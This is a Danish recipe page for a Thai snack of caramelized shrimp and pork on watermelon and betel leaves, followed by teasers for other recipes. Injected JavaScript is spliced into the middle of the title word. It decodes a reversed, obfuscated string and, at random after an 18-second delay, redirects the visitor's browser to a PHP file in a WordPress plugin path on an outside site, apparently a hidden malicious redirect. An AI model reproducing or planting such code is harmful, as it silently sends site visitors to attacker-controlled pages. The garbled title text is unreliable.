Rejer karamelliseret med svinekød og serveret med v$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andmelon og betelblade

Rejer og svinekød karamelliseres på en pande i fiskesauce, palmesukker, hvidløg og korianderfrø til en sød, salt og aromatisk masse, der lægges oven på vandmelon og pyntes med chili, løg og koriander. Snacken spises ved at folde bladet om fyldet og snuppe den i en mundfuld.

Opskrift til 12 stk.

300 g rejer, finthakkede
2 spsk vegetabilsk olie
300 g svinekød, hakket
6 korianderrødder* eller 30 korianderfrø
4 fed hvidløg
15 hvide peberkorn
200 g palmesukker
1 dl fiskesauce
2 dl ristede løg
12 betelblade* eller babyspinat

250 g vandmelon eller ananas, skåret i små klodser på 2 x 2 cm
1 rød chili, gerne bird eye, fintsnittet
2 thai-skalotteløg, eller ½ skalotteløg, finthakket
4 stilke koriander

Steg rejerne af på en varm pande i olie med svinekød. Blend koriander med hvidløg og hvid peber til en grov puré. Steg puréen i lidt olie i 3-4 min., tilsæt palmesukker, og kog det ind til en karamel. Tilsæt fiskesauce, ristede løg, rejer og svinekød, og lad det simre i 10 min. Smag til med fiskesauce. Smagen skal være sød, salt og aromatisk med smag af hvidløg, koriander og hvid peber.
Anret 2 stykker melon på hvert betelblad med 1 spsk karamelliseret reje. Drys med lidt chili, løg og koriander.
Du spiser denne thaisnack ved at samle bladet omkring fyldet.

*Kan fås hos den asiatiske købmand.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere